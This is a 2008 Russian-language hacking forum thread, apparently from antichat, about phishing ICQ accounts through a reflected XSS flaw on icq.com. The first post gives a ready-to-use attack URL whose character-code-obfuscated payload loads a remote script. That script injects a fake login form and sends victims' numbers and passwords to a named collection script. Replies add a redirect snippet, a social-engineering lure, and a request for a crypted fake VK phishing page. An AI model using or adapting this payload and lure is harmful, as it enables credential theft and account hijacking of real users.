Фэйк через Xss на Icq.com

Discussion in 'Уязвимости' started by ZET36, 18 Mar 2008.

  1. ZET36

    ZET36 Elder - Старейшина

    Joined:
    8 Oct 2007
    Messages:
    250
    Likes Received:
    49
    Reputations:
    0
    Увидел тему на форуме "Хss на Icq.com" только вот смысла в ней нету. ведь имея куки юин не угониш.

    в голову пришла идея использовать фэйк через хсс

    вот пример такой реализации фэйка через хss (пассивную, активную жалко выкладывать)

    Code:
    http://www.icq.com/search/results.php?q=%3Cscrip%3Edocument.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,119,101,119,113,101,119,113,101,113,101,119,113,101,119,113,46,110,97,114,111,100,46,114,117,47,102,51,46,106,115,34,62,60,47,115,99,114,105,112,116,62))%3C/script%3E
    
    пс: убрать все пробелы в ссылке

    номер-пароль будут приходить на http://antichat.org/s/red/log.php

    актуально под всеми браузерами
    ( правдо в лисе приходят штук так 20 отчотов вместо одного)

    скрипт фэйка почти беспаливный после ввода данных в форму данные летят на снифер и потом пытаются залогинится с этими данными на www.icq.com так что жертва пропалить ничего неладного (типо переадресации на левый сайт, обычнно этот метод используют в таких фэйках) не должна
     
    #1 ZET36, 18 Mar 2008
    Last edited: 18 Mar 2008
    4 people like this.
  2. ultimatum

    ultimatum Elder - Старейшина

    Joined:
    28 Apr 2007
    Messages:
    142
    Likes Received:
    65
    Reputations:
    -13
    Лиса криво себя ведёт, а так да. В опере затребовала сертификаты безопасности.
     
  3. MaSter GeN

    MaSter GeN Elder - Старейшина

    Joined:
    26 Jan 2008
    Messages:
    52
    Likes Received:
    31
    Reputations:
    0
    ну на примере icq не получиться но пассивку для фейка можно и так использовать :
    Code:
    <script type="text/javascript">window.top.location = "url";</script>
    
    что откроет нам наш url с фейком
     
  4. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    Только вот кто заходит на icq.com?
    Тем более люди с четкими номерами
     
    2 people like this.
  5. ZET36

    ZET36 Elder - Старейшина

    Joined:
    8 Oct 2007
    Messages:
    250
    Likes Received:
    49
    Reputations:
    0
    это из за https протокла где авторизация
     
  6. ZET36

    ZET36 Elder - Старейшина

    Joined:
    8 Oct 2007
    Messages:
    250
    Likes Received:
    49
    Reputations:
    0
    можно но это будет паливно так как в урл будет виден левый сайт а не icq.com когда он будет авторизовавыться, мало кто будет отсылать свой пароль от аськи на левый сайт
     
    #6 ZET36, 21 Mar 2008
    Last edited: 21 Mar 2008
  7. ZET36

    ZET36 Elder - Старейшина

    Joined:
    8 Oct 2007
    Messages:
    250
    Likes Received:
    49
    Reputations:
    0
    Незнаю можно применить Си тпо такого "Служба icq хочет повысить посещение на сайте , если вы зайдёте в свой профиль и активируете данный запрос по этой ссылке то ваш значок в аське будет золотого цвета" ну или что то типа такого

    а вообще этот фейк висит у меня на активной хсс (так что исчите активку)
     
    #7 ZET36, 21 Mar 2008
    Last edited: 21 Mar 2008
  8. MaSter GeN

    MaSter GeN Elder - Старейшина

    Joined:
    26 Jan 2008
    Messages:
    52
    Likes Received:
    31
    Reputations:
    0
    ага СЭ в данном случаеш решает все !! если честно то можно уговорить и на adult.com ввести номер своей аськи с паролем ;)
     
    #8 MaSter GeN, 21 Mar 2008
    Last edited: 21 Mar 2008
  9. ZET36

    ZET36 Elder - Старейшина

    Joined:
    8 Oct 2007
    Messages:
    250
    Likes Received:
    49
    Reputations:
    0
    ды в любых пассивных атаках Си неотемлимая чать, возможно даже главнее чем сама ценность уязвимости
     
  10. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    кто напишет фейк-вк для меня на яваскрипте и потом закриптует..?)